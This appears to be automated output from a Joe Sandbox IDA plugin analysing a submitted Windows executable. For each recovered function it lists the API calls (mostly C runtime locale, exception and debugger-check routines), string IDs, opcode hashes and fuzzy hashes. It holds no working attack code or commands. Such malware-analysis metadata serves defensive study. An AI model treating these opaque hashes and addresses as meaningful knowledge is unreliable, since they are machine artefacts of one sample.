                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 00C6D985
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 00C6D992
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: e63cc1d37369e023aae24bbdcddcb33787ea292e650ba3194cc20ec9cd438e29
                                                    • Instruction ID: f809e5f7a9a50d7d7233c4902f183d52cb50ea9e036fb0a2034356411ae47b61
                                                    • Opcode Fuzzy Hash: e63cc1d37369e023aae24bbdcddcb33787ea292e650ba3194cc20ec9cd438e29
                                                    • Instruction Fuzzy Hash: 8E31C475D012289BCB21EF68DC8978DBBB8FF08310F5041EAE41DA7291EB709B859F55
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a4f3a54db89fbb62046169a24586f7d391bc7c95b58a475ac80c624a344fee02
                                                    • Instruction ID: c9a91ff8504dedff03d87bd0b02e98b3d922fd2e971a9cdfd1cd8544ee0b571e
                                                    • Opcode Fuzzy Hash: a4f3a54db89fbb62046169a24586f7d391bc7c95b58a475ac80c624a344fee02
                                                    • Instruction Fuzzy Hash: 49F14071E012599FDF14CFA9C8806ADFBB1FF88314F158269E829AB391D7319E01DB90
                                                    APIs
                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000000), ref: 00C76FE6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • API ID: ExceptionRaise
                                                    • String ID:
                                                    • API String ID: 3997070919-0
                                                    • Opcode ID: 1f256432e30bc496a2125aa5e9a7713c762659c726ade93b785a3a2172306c78
                                                    • Instruction ID: 3f58ddafee021922193d43eb2f7bec569c5bb471517be99f0d9ea5faac8cd3c6
                                                    • Opcode Fuzzy Hash: 1f256432e30bc496a2125aa5e9a7713c762659c726ade93b785a3a2172306c78
                                                    • Instruction Fuzzy Hash: 62B13C35610609DFD719CF28C48AB657BA1FF45364F25C658E8AECF2A1C335EA91CB40
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C69642
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • API ID: FeaturePresentProcessor
                                                    • String ID:
                                                    • API String ID: 2325560087-0
                                                    • Opcode ID: f5c36702df4b829efe9e3da24fbf366760a0a424f7d46d79e4cd578ef087aad5
                                                    • Instruction ID: 7947797a9cf24f2a70cab1cfc9d4e1cb297f6142f209f6a19766b06fbf8eef9a
                                                    • Opcode Fuzzy Hash: f5c36702df4b829efe9e3da24fbf366760a0a424f7d46d79e4cd578ef087aad5
                                                    • Instruction Fuzzy Hash: 46516DB19146058BDF64CFA9D9C5BAEBBF4FB48314F14852AE416EB294D378DA00CF50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • API ID:
                                                    • String ID: 0
                                                    • API String ID: 0-4108050209
                                                    • Opcode ID: 23cac9371c1b21c94c8b4bff7d3ef3c1e67d2251687d2e0fef87409a041b6017
                                                    • Instruction ID: 2d7be9cb805426be1ba583a4c85e8cb55a705fad2b7c1a974135bb3e28706346
                                                    • Opcode Fuzzy Hash: 23cac9371c1b21c94c8b4bff7d3ef3c1e67d2251687d2e0fef87409a041b6017
                                                    • Instruction Fuzzy Hash: 74C1AF70A0064A9FCB34CF68E4D067EBBA1BF45314F24463DD8AA97292C731AE47DB51
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C805C6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • API ID: ErrorLast$InfoLocale
                                                    • String ID:
                                                    • API String ID: 3736152602-0
                                                    • Opcode ID: 641ba499a7c4c97464ae85d166f75f3f1ec357e5af45048059b6854cf2bfd321
                                                    • Instruction ID: 095e0637d42884df2aa044117ec3c98d6829a211f7d81b4ab3c3003473571991
                                                    • Opcode Fuzzy Hash: 641ba499a7c4c97464ae85d166f75f3f1ec357e5af45048059b6854cf2bfd321
                                                    • Instruction Fuzzy Hash: 82219871610246ABDB28AB25DC81ABB73A8EF44318F20407DFD15D7141EB74DE549B58
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • EnumSystemLocalesW.KERNEL32(00C8031F,00000001,00000000,?,-00000050,?,00C80950,00000000,?,?,?,00000055,?), ref: 00C8026B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                    • String ID:
                                                    • API String ID: 2417226690-0
                                                    • Opcode ID: 2439eb6cfdcd3d9ee2cf88ab9f710de09a2df7b9f56679fd1ee623a5b0b87be6
                                                    • Instruction ID: 2b0c208ff44eaaafb0150ac4575f1cfe996402763803f8f10abd278911e6b98e
                                                    • Opcode Fuzzy Hash: 2439eb6cfdcd3d9ee2cf88ab9f710de09a2df7b9f56679fd1ee623a5b0b87be6
                                                    • Instruction Fuzzy Hash: AE11253A6007055FDB28AF39C8A56BAB792FF8035CF28442CE95687A41D7B1B946CB40
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00C8061C,00000000,00000000,?), ref: 00C807CD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • API ID: ErrorLast$InfoLocale
                                                    • String ID:
                                                    • API String ID: 3736152602-0
                                                    • Opcode ID: 29fe18177169b69534cc90592cbf8fa4c96971225aadbce2832626c7087e5639
                                                    • Instruction ID: dfe301e69a7a0f7e975dac36e17976dd1cbc9685af46fdfd2bece55385d0c79e
                                                    • Opcode Fuzzy Hash: 29fe18177169b69534cc90592cbf8fa4c96971225aadbce2832626c7087e5639
                                                    • Instruction Fuzzy Hash: 66F0F932A401116FDB6866258C497BA7758EF4075CF244428EC16A3180EA70FE85D7D4
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00C8015B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • API ID: ErrorLast$InfoLocale
                                                    • String ID: utf8
                                                    • API String ID: 3736152602-905460609
                                                    • Opcode ID: 7d65f1963b56fdab48da54c9935caad026385f1ada9b39dbd56a3613cbc5edaa
                                                    • Instruction ID: 23f8b6a04a56307d3f7227026cf1e63df12b026ed02186977cef97ce7a51f1c2
                                                    • Opcode Fuzzy Hash: 7d65f1963b56fdab48da54c9935caad026385f1ada9b39dbd56a3613cbc5edaa
                                                    • Instruction Fuzzy Hash: F2F02232610105ABCB18AB74DC8AFBF33ECDB44328F100179F516D7281EE34AD099754
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • EnumSystemLocalesW.KERNEL32(00C80572,00000001,?,?,-00000050,?,00C80914,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00C802DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                    • String ID:
                                                    • API String ID: 2417226690-0
                                                    • Opcode ID: 54d599befb70f21f045937407964ce639a2bd37cb0838417a542cb606e57543d
                                                    • Instruction ID: 733e3fdb21c68e97f33b1e850d38c1c2a2872cb2d0943353a00256fbddf985b8
                                                    • Opcode Fuzzy Hash: 54d599befb70f21f045937407964ce639a2bd37cb0838417a542cb606e57543d
                                                    • Instruction Fuzzy Hash: 70F0F6362003045FDB246F39D886A7A7B91FF8176CF25842CF9458BA90CAB19D46DB58
                                                    APIs
                                                      • Part of subcall function 00C70829: EnterCriticalSection.KERNEL32(-00CC99FF,?,00C75DB6,00000000,00C926F0,0000000C,00C75D7D,?,?,00C77432,?,?,00C768CE,00000001,00000364,00000001), ref: 00C70838
                                                    • EnumSystemLocalesW.KERNEL32(00C7887F,00000001,00C92810,0000000C,00C78CEE,00000000), ref: 00C788C4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                    • String ID:
                                                    • API String ID: 1272433827-0
                                                    • Opcode ID: b60129c27673f47d6a96e0a2e9890eef1d8558e275ef5c8e8ae727711fa9326f
                                                    • Instruction ID: a5b63c6b001236b70e205a971daaf4653694bb9ea1088f537f05dee4069e6e84
                                                    • Opcode Fuzzy Hash: b60129c27673f47d6a96e0a2e9890eef1d8558e275ef5c8e8ae727711fa9326f
                                                    • Instruction Fuzzy Hash: 8DF04972A50204DFDB10DFA8E84AB9C77B0FB04721F10856AF414DB2E1CB7559049F85
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • EnumSystemLocalesW.KERNEL32(00C80107,00000001,?,?,?,00C80972,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C801E5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                    • String ID:
                                                    • API String ID: 2417226690-0
                                                    • Opcode ID: a94ed47a583237dd912e848b9fe470d98b1df15e7f3abbfbabf343551e988432
                                                    • Instruction ID: 8ea5ed881c5e0fc38091eb3de0d8783f990d170872e6f0385040c772417dd5db
                                                    • Opcode Fuzzy Hash: a94ed47a583237dd912e848b9fe470d98b1df15e7f3abbfbabf343551e988432
                                                    • Instruction Fuzzy Hash: BFF0553A30024497CB04AF39CC49B6E7F90FFC1728F564058EA098B680CA719947C794
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00C75921,?,20001004,00000000,00000002,?,?,00C74F23), ref: 00C78E26
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: 735fe9505a616dccc9399202246d045d90fe6dc51b924a032245db8cc6735abc
                                                    • Instruction ID: 911969d075d24fac5bffca92181b05505826ffd1216c71536c8b8a49322fd6f5
                                                    • Opcode Fuzzy Hash: 735fe9505a616dccc9399202246d045d90fe6dc51b924a032245db8cc6735abc
                                                    • Instruction Fuzzy Hash: 3DE04F35580218BBCF122F61DC0DBAF7E16EF44760F048010FE1966121CF318D25AB95
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00009AA2,00C690D8), ref: 00C69A9B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: d0c0b73dd17d43230cba8db38528de88b7b910a122d3f4fa4b55ee767b799904
                                                    • Instruction ID: 25bfb19cb10602884235b5460eaff6a49470db117e1f262d2b894b13d70e0e49
                                                    • Opcode Fuzzy Hash: d0c0b73dd17d43230cba8db38528de88b7b910a122d3f4fa4b55ee767b799904
                                                    • Instruction Fuzzy Hash:
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: 7650dc72756be1ead1ade078943ab4f13f1ef97e825b5399bf7c4c58561f91d2
                                                    • Instruction ID: 2c2f7df49d218f9ff5d258c538528a2b89ce6bb5b257047ff9c35446a74d3bad
                                                    • Opcode Fuzzy Hash: 7650dc72756be1ead1ade078943ab4f13f1ef97e825b5399bf7c4c58561f91d2
                                                    • Instruction Fuzzy Hash: 14A02230A02200CF8300CF30EF0C30C3AE8BA002E830280A8E003C32B0EF388008AB03
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a0a1a9af42e0cfda2b61175d80cac1fe488ea7ef7ffd30f744997269cb1d313
                                                    • Instruction ID: bc4441484522be59e77ede9d37f1f29f238cfb10306121877b52e71aa9914ef3
                                                    • Opcode Fuzzy Hash: 0a0a1a9af42e0cfda2b61175d80cac1fe488ea7ef7ffd30f744997269cb1d313
                                                    • Instruction Fuzzy Hash: DAD1BD729087419BC329DF28C881A2FFBE5FFC9714F444A1DF999A7211D730EA449B92
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
                                                    • Instruction ID: 3af2db1c761527683cb5987994c56d9ef41d0e7cee7f3dd47a872440a30f5cb5
                                                    • Opcode Fuzzy Hash: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
                                                    • Instruction Fuzzy Hash: F1E08C72A11228EBCB14DB88C909D8EF3FCEB48B40B518496F605D3200C670DE00D7D0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c9b5b20063a14d7e0b548af78489920c464144fa39d9f7053c57937d3e1c4aeb
                                                    • Instruction ID: 1f57e5785ce5f496428d05520ef6a52bc4331b2a85493c79f99405323866a2fd
                                                    • Opcode Fuzzy Hash: c9b5b20063a14d7e0b548af78489920c464144fa39d9f7053c57937d3e1c4aeb
                                                    • Instruction Fuzzy Hash: B1C08C38000E8046CE2DCD1082F53B53355F391782F80488CD41B0B642C62E9E83F600
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C62275
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C6228F
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C622B0
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C62308
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C6234D
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C6239E
                                                    • __Getctype.LIBCPMT ref: 00C623B5
                                                    • std::_Facet_Register.LIBCPMT ref: 00C623DF
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C623F8
                                                      • Part of subcall function 00C65B7A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C65B86
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
                                                    • String ID: bad locale name
                                                    • API String ID: 2137871723-1405518554
                                                    • Opcode ID: 66faf9b9ac28624fc79d685d03c6bf65b0e5c6e1f7da90ba6b11c18f6e077779
                                                    • Instruction ID: b00f7b781e62c09508b7922a80d78236948ec78177bbfeabb6a2de3851e8c8e4
                                                    • Opcode Fuzzy Hash: 66faf9b9ac28624fc79d685d03c6bf65b0e5c6e1f7da90ba6b11c18f6e077779
                                                    • Instruction Fuzzy Hash: 36419A72508B408FC331DF58C8C0B5AB7E4EF91720F15096CE8949B362DB35EA4ADB92
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C62435
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C6244F
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C62470
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C624CB
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C62513
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C62571
                                                    • __Getctype.LIBCPMT ref: 00C62588
                                                    • std::_Facet_Register.LIBCPMT ref: 00C625DB
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C625F4
                                                      • Part of subcall function 00C65B7A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C65B86
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
                                                    • String ID: bad locale name
                                                    • API String ID: 2137871723-1405518554
                                                    • Opcode ID: 2f70f01c4c682b84e157f25140edc2caa6524262e314c5a5ed15f905045c83fe
                                                    • Instruction ID: da957d8078872453055d66e1ab9cab8755936a33a95c3f8b49283523169c35f8
                                                    • Opcode Fuzzy Hash: 2f70f01c4c682b84e157f25140edc2caa6524262e314c5a5ed15f905045c83fe
                                                    • Instruction Fuzzy Hash: 9251B371504B50CFC731DF68C880B6AB7E0FF94710F25495DE9999B222EB34E985CB92
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C62622
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C6263F
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C62660
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C626BB
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C626FC
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C6273F
                                                    • std::_Facet_Register.LIBCPMT ref: 00C62768
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C62781
                                                      • Part of subcall function 00C65B7A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C65B86
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Locinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
                                                    • String ID: bad locale name
                                                    • API String ID: 3096327801-1405518554
                                                    • Opcode ID: a1d647830a22bdf2039a418ce4630a00b78d7c2347731da26d1f880ae6fd39f4
                                                    • Instruction ID: 96102c6a4df4e9862eabbc2e06d0317424a92acaa1a7a0886d1cde8d78b3f34d
                                                    • Opcode Fuzzy Hash: a1d647830a22bdf2039a418ce4630a00b78d7c2347731da26d1f880ae6fd39f4
                                                    • Instruction Fuzzy Hash: FC41AC72A087118FC330DF68C8C0A5EB7E1AF94750F15455DF899AB222DB35ED0ACB96
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C635D1
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C63618
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00C636DA
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00C636DF
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00C636E4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                    • String ID: bad locale name$false$true
                                                    • API String ID: 164343898-1062449267
                                                    • Opcode ID: aabe385330899368c3cb36ce663ebb14e900ac3b177d737bcde85882bc11403e
                                                    • Instruction ID: 654f647b97bf82ed6733f8213b1c9a25cbefaa90afd8e3a8e29aa8cf2ee5cdc4
                                                    • Opcode Fuzzy Hash: aabe385330899368c3cb36ce663ebb14e900ac3b177d737bcde85882bc11403e
                                                    • Instruction Fuzzy Hash: 3B418C71605381AFC730EF65C881B5ABBE0BF94700F44482EF49997352EB75DA09CB56
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C68FE1
                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00C68FEF
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00C69000
                                                    • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00C69011
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                    • API String ID: 667068680-1247241052
                                                    • Opcode ID: 68437afaa186003ec991a20168300bfa773356dde92115ca0c0a4c54e26cbcfe
                                                    • Instruction ID: e3f372834e3e51099f9752676db0b6657ab0a84c8de0990e0cfaaf33a9650914
                                                    • Opcode Fuzzy Hash: 68437afaa186003ec991a20168300bfa773356dde92115ca0c0a4c54e26cbcfe
                                                    • Instruction Fuzzy Hash: 9DE0EC31591710AF8B01BF74FC0DFAD3EA8FA067063590226F501D26B0DBB2440ACB58
                                                    APIs
                                                    • type_info::operator==.LIBVCRUNTIME ref: 00C6C8B7
                                                    • ___TypeMatch.LIBVCRUNTIME ref: 00C6C9C5
                                                    • _UnwindNestedFrames.LIBCMT ref: 00C6CB17
                                                    • CallUnexpected.LIBVCRUNTIME ref: 00C6CB32
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 2751267872-393685449
                                                    • Opcode ID: 520855d6b0a220d4fd2199f4fd5ac4df813794cfa7062090306fa2fbea21681b
                                                    • Instruction ID: 43a21aebc3c46932762565ff9f5ba770967609df9b206472b40acaa612ca1f63
                                                    • Opcode Fuzzy Hash: 520855d6b0a220d4fd2199f4fd5ac4df813794cfa7062090306fa2fbea21681b
                                                    • Instruction Fuzzy Hash: 4CB15971800209EFCF34EFA4C8C19BEB7B5FF58310B14416AE8A56B252D731EA51EB91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3907804496
                                                    • Opcode ID: c93e5d839631f2e213ff8fbcaffd4a118c9761fdc3150d7957e7f1630d6fc305
                                                    • Instruction ID: 1f43e6d2e4fbe873fd908ca60499e34c029583bec628c0981e7ffdffa0f16a60
                                                    • Opcode Fuzzy Hash: c93e5d839631f2e213ff8fbcaffd4a118c9761fdc3150d7957e7f1630d6fc305
                                                    • Instruction Fuzzy Hash: B4B1E274A0420AAFDB11DFA9D8C1BADBBB1BF45300F14C15DE919AB292C7709E42DF61
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __freea$__alloca_probe_16$Info
                                                    • String ID:
                                                    • API String ID: 127012223-0
                                                    • Opcode ID: 856de0512d9a5c24aa139789f3b20043f88b6ed11b83983b1ec5cd346d4c46a8
                                                    • Instruction ID: 1a09d4472c18085bdc42188812422e8a9fbda30a46e0271ef64d5ef656153e07
                                                    • Opcode Fuzzy Hash: 856de0512d9a5c24aa139789f3b20043f88b6ed11b83983b1ec5cd346d4c46a8
                                                    • Instruction Fuzzy Hash: 2A712A32904606ABDF25BF948C81FAF7BBAAF45318F250019F928A7281D775DD00D7A9
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00C68CBD
